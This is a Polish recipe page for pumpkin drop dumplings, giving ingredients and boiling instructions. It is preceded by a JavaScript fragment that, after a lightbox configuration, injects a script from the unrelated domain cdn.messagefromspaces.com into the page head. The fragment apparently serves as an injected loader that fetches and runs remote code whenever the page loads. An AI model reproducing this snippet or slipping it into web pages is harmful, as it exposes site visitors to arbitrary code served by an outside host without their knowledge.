, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Dyniowe kluseczki kładzione

Wydrukuj artykuł Wydrukuj artykuł

Dyniowe kluseczki kładzione

Miałam zamiar zrobić dziś gnocchi dyniowe, podobne do gnocchi szpinakowych ale moje puree dyniowe zawierało dużo soku i konsystencja ciasta nie pozwoliła mi na formowanie kulek. Zrobiłam zatem kluseczki kładzione:) Wyszły pyszne, aksamitnie delikatne!

Składniki:

  • 2/3 szklanki puree dyniowego*
  • 2/3 szklanki serka białego jak na sernik (użyłam serka „Mój Ulubiony” z Wielunia)
  • 2/3 szklanki mąki pszennej
  • 1 jajko
  • szczypta soli
  • kopiasta łyżka mąki ziemniaczanej

Jajko roztrzepać, dodać pozostałe  składniki i dokładnie wymieszać. Zagotować wodę z łyżeczką soli. Nabierać ciasto łyżeczką (niezbyt dużo) i wkładać do wrzątku. Ciasto powinno być gęste lecz stosunkowo luźne, a łyżeczka jednorazowo zwilżona wodą – wtedy łatwo ciasto się od niej odklei. Po włożeniu do wrzątku kluski delikatnie zamieszać i gotować do wypłynięcia.

* mój sposób na przygotowanie puree z dyni opisałam przy placuszkach dyniowych

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony